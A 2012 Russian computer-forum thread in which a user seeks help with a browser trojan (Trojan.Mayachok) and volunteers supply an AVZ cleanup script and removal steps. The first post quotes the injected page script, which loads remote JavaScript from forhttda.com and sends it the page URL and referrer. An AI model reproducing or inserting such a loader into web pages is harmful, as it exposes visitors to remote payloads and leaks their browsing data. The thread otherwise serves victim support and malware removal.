Форум программистов и сисадминов CyberForum.ru
Вернуться   Форум программистов и сисадминов CyberForum.ru > Форум Компьютерный форум > Форум Компьютерная безопасность > Форум Лечение компьютерных вирусов
Восстановить пароль Регистрация

Ответ Создать новую тему
 
Старый 31.07.2012, 13:08   #1
ashma
Новичок
 
Регистрация: 31.07.2012
Сообщений: 4
Репутация: 0 (0)
браузерный вирус / Лечение компьютерных вирусов

Здравствуйте.
Поймал интересный вирус.

Вирус прописал адреса в файле хост ( как здесь: speedbar - вирус )

Браузеры не грузили страницы. Почистил файл хост, нашел и удалил вирусные файлы (taskhost.exe он назывался / лежал в appdata). Также почистил реестр и автозагрузку, связанные параметры с этим плохим файлом. Проверил компьютер на вирусы (нод / и CureIT в безопасном режиме). Все вроде хорошо.

Но ни одни из браузеров (4 браузера) не открывают нормально сайты в интернете. То подвисают сильно, то просто не могут открыть страницы, то еле еле грузят - через раз все. А еще на некоторых сайтах появляются всплывающие окна - там где не должно быть таких окон тоже.

Посмотрев исходные коды страниц, я увидел что в каждом из браузеров в конце страницы подписывается такой код (даже сейчас на вашем сайте), но почему-то этот код не грузится на сайтах поисковиков:
Код HTML5
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<script type="text/javascript">
/* <![CDATA[ */
 
$(document).ready(function(){ 
rcmail.init();
var images = ["skins\/litecube-f\/images\/icons\/folders.png","skins\/litecube-f\/images\/mail_footer.png","skins\/litecube-f\/images\/taskicons.gif","skins\/litecube-f\/images\/display\/loading.gif","skins\/litecube-f\/images\/pagenav.gif","skins\/litecube-f\/images\/mail_toolbar.png","skins\/litecube-f\/images\/searchfield.gif","skins\/litecube-f\/images\/messageicons.png","skins\/litecube-f\/images\/icons\/reset.gif","skins\/litecube-f\/images\/abook_toolbar.png","skins\/litecube-f\/images\/icons\/groupactions.png","skins\/litecube-f\/images\/watermark.png"];
            for (var i=0; i<images.length; i++) {
                img = new Image();
                img.src = images[i];
            }
});
/* ]]> */
</script>
 
<script>var gtl=self;if ( gtl == top ){document.write("<script src='http" + (("https:" == document.location.protocol) ? "s" : "") +"://forhttda.com/phpbb/js.php?ran="+encodeURIComponent("PtZs4fMZvs2bDhOQ3O1fG8S6hmdrZ9RNo5oVSpdox3OkHk1QosJbKivyrSmD0bD1oMgFRfj9e2g_")+"&t=stat&u="+escape(document.URL)+"&r="+escape(document.referrer)+"&v=35101&"+Math.random()+"'>"+unescape("%3C/script%3E"));}</script>
Также, для примера, вообще не грузятся сайты мэйл ру, в контакте,одноклассники, яндекс через раз..

не знаю что делать, как убрать это.. помогите, пожалуйста, советом
Старый 31.07.2012, 13:12   #2
Katharsis
Заблокирован
Вирусоборец
 
Регистрация: 16.09.2010
Сообщений: 14,449
Репутация: 8510 (4871)
Лучшие ответы: 66
браузерный вирус

Правила оформления запроса лечения. Если не будет логов, мы отправим вас в эту тему
Другие темы раздела Бесплатная профессиональная помощь в изгнании вирусов и прочей нечисти из вашего компьютера.
Лечение компьютерных вирусов Пропала скорость интернета
Propala skorost interneta. Bila 5000kb a stala 0,8kb. sdelaju skripti i visliu, i vilozu zdes. Budu ocen blagodarna za pomos! Пропала скорость интернета. была 5000kb а стала 0.8kb. Сделаю скрипты и вышлю, и выложу здесь. Буду очень благодарна за помощь!
При открытии браузера - загружает страничку spee ddial.ru Лечение компьютерных вирусов
Помогите плиз избавиться эт этой нечисти
Старый 31.07.2012, 13:28  [ТС]   #3
ashma
Новичок
 
Регистрация: 31.07.2012
Сообщений: 4
Репутация: 0 (0)
браузерный вирус

я не могу скачать нужные программы для анализа, не могу прикреплять файлы... вирус мне просто не дает этого делать ни в одном брауезере. я бы рад, но ни как.. и другого компьютера рядом нет

Еще при попытке обновить браузеры на офф сайтах - грузится страничка о том, что в вашем браузере обнаружен вирус, чтоб обновить введите номер телефона для получения бесплатной смс с кодом для подтверждения что вы не робот. Причем текст одинаков совершенно на всех офф сайтах браузеров ( мозилла, эксплоир, опера). Домены в бразерной строке верные. Скрипт также не дает мне ходить по офф сайтам браузеров, всегда подгружая страничку о том что необходимо обновить браузер, так как он заражен.
Старый 31.07.2012, 13:44   #4
Katharsis
Заблокирован
Вирусоборец
 
Регистрация: 16.09.2010
Сообщений: 14,449
Репутация: 8510 (4871)
Лучшие ответы: 66
браузерный вирус

отсюда сможете взять?

загрузить логи в крайнем случае можно на любой файлообменник
Старый 31.07.2012, 13:44
Google
Объявления
Старый 01.08.2012, 09:50  [ТС]   #5
ashma
Новичок
 
Регистрация: 31.07.2012
Сообщений: 4
Репутация: 0 (0)
браузерный вирус

сделал логи, пришлось воспользоваться другим компьютером для загрузки файлов
Вложения
Тип файла: rar info.rar (6.3 Кб, 29 просмотров)
Тип файла: rar log.rar (8.3 Кб, 13 просмотров)
Тип файла: zip virusinfo_syscheck.zip (30.6 Кб, 23 просмотров)
Тип файла: zip virusinfo_syscure.zip (31.7 Кб, 10 просмотров)
Старый 01.08.2012, 13:34   #6
Katharsis
Заблокирован
Вирусоборец
 
Регистрация: 16.09.2010
Сообщений: 14,449
Репутация: 8510 (4871)
Лучшие ответы: 66
браузерный вирус

не имею технической возможности посмотреть ваши логи, подождите, ответит другой специалист
Старый 01.08.2012, 13:46   #7
shestale
Модератор
Вирусоборец
 
Аватар для shestale
 
Регистрация: 22.02.2011
Сообщений: 6,313
Репутация: 6223 (2177)
Лучшие ответы: 45
браузерный вирус

Внимание! Рекомендации написаны специально для этого пользователя. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе.
Если у вас похожая проблема - создайте тему в разделе Лечение компьютерных вирусов и выполните Правила запроса о помощи.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1. Закройте все программы, отключите антивирус, файрволл и прочее защитное ПО.

AVZ, меню Файл - Выполнить скрипт - Скопировать ниже написанный скрипт-Нажать кнопку Запустить.
Код Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Windows\system32\hvtdpdj.dll','');
 QuarantineFile('C:\Windows\System32\SearchProtocolHost.exe','');
 QuarantineFile('C:\Windows\system32\4502.tmp','');
 DeleteFile('C:\Windows\system32\4502.tmp');
 DeleteFile('C:\Windows\system32\hvtdpdj.dll');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
RegKeyStrParamWrite('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','AutoCreateQuarantine', '"' + GetAVZDirectory + 'avz.exe' + '"' + ' Script=' + '"' + GetAVZDirectory + 'Script.txt' + '"');
AddLineToTxtFile(GetAVZDirectory + 'Script.txt', 'begin'+#13#10+' CreateQurantineArchive(GetAVZDirectory' + ' + ' + Chr(39) + 'quarantine.zip' + Chr(39) + ');'+#13#10+' RegKeyParamDel('+Chr(39)+'HKEY_CURRENT_USER'+Chr(39) + ', ' +Chr(39)+'SoftwareMicrosoftWindowsCurrentVersionRun'+Chr(39)+ ', '+Chr(39)+'AutoCreateQuarantine'+Chr(39)+');'+#13#10+' ExecuteFile('+Chr(39)+'explorer.exe'+Chr(39) + ', ' + 'GetAVZDirectory, 1, 0, false);'+#13#10+' ExitAVZ;'+#13#10+'end.');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
ExecuteWizard('SCU',2,3,true);
RebootWindows(true);
end.
После выполнения скрипта компьютер перезагрузится!

2. Полученный архив quarantine.zip из папки с AVZ, отправьте с помощью этой формы или на этот почтовый ящик: quarantine<at>safezone.cc (замените <at> на @), укажите ссылку на тему и ник на форуме.

3. Сделайте лог SecurityCheck by screen317

4. Скачайте Malwarebytes' Anti-Malware или с зеркала, установите, обновите базы, выберите "Perform Full Scan" ("Полное сканирование"), нажмите "Scan" ("Сканирование"), после сканирования - Ok - Show Results ("Показать результаты") - Откройте лог, скопируйте в блокнот и прикрепите его к следующему посту.
Если базы MBAM в автоматическом режиме обновить не удалось, обновите их отдельно. Загрузить обновление MBAM.

5. Повторите логи AVZ и Rsit и прикрепите их к сообщению.
Старый 01.08.2012, 14:16  [ТС]   #8
ashma
Новичок
 
Регистрация: 31.07.2012
Сообщений: 4
Репутация: 0 (0)
браузерный вирус

Спасибо за помощь.
Пока ждал ответа, сам разобрался.

Удалил остатки вирусов:

Встречается разновидность - trojan.mayachok.550.

Что представляет собой Trojan.Mayachok.1 (он же trojan.win32.ddox.ci, trojan.win32.cidox, trojan.win32.zapchast.feh, trojan:Win32/Vundo.OD, trojan.Win32.Mondere, trojan.Generic.KDV.169924)? По описаниям ресурса Dr.Web, это:


Цитата
Троянец, который крадет средства со счетов клиентов мобильных операторов, предлагая пользователям ответить на входящее СМС-сообщение.


Trojan.Mayachok.1 это файл .dll - динамически подключаемая библиотека, которая после установки загружается в адресное пространство памяти всех запущенных процессов (процесс установки заканчивается форсированной перезагрузкой компьютера), поэтому при сканировании системы антивирусом в нормальном режиме троянец часто видится пользователю как бы "сидящим внутри" различных файлов и "перемещающимся" из одного файла в другой. Может сложиться впечатление что Trojan.Mayachok.1 заражает файлы, но на самом деле это не так.

Что происходит после заражения? Описание повадок зловреда на сайте Dr.Web достаточно подробное поэтому не будем повторяться, от себя только добавлю что чаще всего пострадавший сталкивается со следующими проблемами:

// Подменой запрашиваемых страниц на "internet.com" "Ростелеком. Канал перегружен", "Подтвердите принадлежность аккаунта" и подобных;

// Полной невозможностью выйти в интернет при помощи любого браузера, или вместо нормальной загрузки сайта открытие страниц происходит в виде, напоминающем исходный код;

// Блокировкой запуска различных программ в нормальном режиме, в безопасном, как правило всё работает.

Итак, выяснили, у нас действительно Trojan.Mayachok.1 Как лечить? Нет смысла скачивать большое количество разнообразного антивирусного софта и тратить время на многочасовые проверки в надежде что поможет хоть что-то из этого - ни одно, так другое. Такая вероятность есть, но в некоторых случаях троянец хоть и определяется антивирусом, но оказывается ему не по зубам - при следующих проверках мы видим его снова и снова. Не стоит отчаиваться, всё на самом деле очень просто:

1. Открываем редактор реестра: нажимаем "Пуск" => "Выполнить" вписываем команду: regedit, нажимаем enter. Далее находим ветку:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
и параметр AppInit_DLLs

Смотрим значение этого параметра. Если видим запись, подобную этой:
"AppInit_DLLs" = "C:\windows\system32\tvhihgf.dll"

(кроме tvhihgf.dll имя файла может состоять семи из любых других латинских букв) - удаляем ее (имя файла запомните или запишите, чтобы потом легко его найти). Сам параметр AppInit_DLLs при этом оставляем, убираем только значение.

Ошибочные действия при правке реестра могут серьезно повредить систему!

----------------------------

а вот шаблон страницы, подгружаемой вирусом, не нашел, благодаря Вам также удалил плохую страницу.

Спасибо!

Добавлено через 4 минуты
И скрипт тоже выполнил. Полученный архивы и логи делаю, отправлю на указанную почту.
Старый 01.08.2012, 15:13   #9
akok
Форумчанин
Вирусоборец
 
Регистрация: 01.09.2009
Сообщений: 709
Репутация: 2962 (996)
Лучшие ответы: 14
браузерный вирус / Лечение компьютерных вирусов

Не факт. Букет болезней еще никто не отменял. Прошу, выполняйте рекомендации без самодеятельности или мы прекратим оказывать вам помощь.
Старый 01.08.2012, 15:13
Yandex
Объявления
После регистрации реклама в сообщениях будет скрыта и будут доступны все возможности форума.
Ответ Создать новую тему

Похожие темы
Тема Автор
C# для начинающих Как использовать в приложениях браузерный движок WebKit
скачал браузерный движёк WebKit "http://webkit.org";но непойму как его добавить в библиотеку с#. подскажите
alekkosi
Лечение компьютерных вирусов браузерный вирус
в поисковике, заместо сайтов открывается html код страницы, некоторые страницы вообще не загружаются, сильно тормозит. на вас случайно наткнулся, проделал все операции. надеюсь поможите p.s^через некоторое время, заместо сайта открывается - internet.com и пишет подключите прокси, за смс...
Layserg
Oracle PLSQL без установки - браузерный интерфейс
Привет всем. нужно писать программки PL/SQL не на своем компьютере... невозможно поставить сервер или клиент... кто нибудь знает интернет среду для моих целей? Спасибки.
Allegra
Программирование игр и графики Браузерный 3D движок
Посоветуйте хороший браузерный 3D движок. Модераторы, можно как то исправить название темы? Задел кнопку, и получилась фигня. Должно было быть: "Браузерный 3D движок".
taras atavin
C#: WPF и Silverlight Браузерный аплет на Silverlight
Доброго времени суток господа! Я только начинаю изучать основы веб разработки, поэтому прошу сильно не пинать за некое "каверкание" понятий. Итак суть задачи: Необходимо реализовать аплет использующий технологию Silverlight, суть аплета состоит в том что он должен показывать пользователям(через...
archi.
Опции темы

Текущее время: 19:50. Часовой пояс GMT +4.

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.7 PL3
Copyright ©2000 - 2014, vBulletin Solutions, Inc.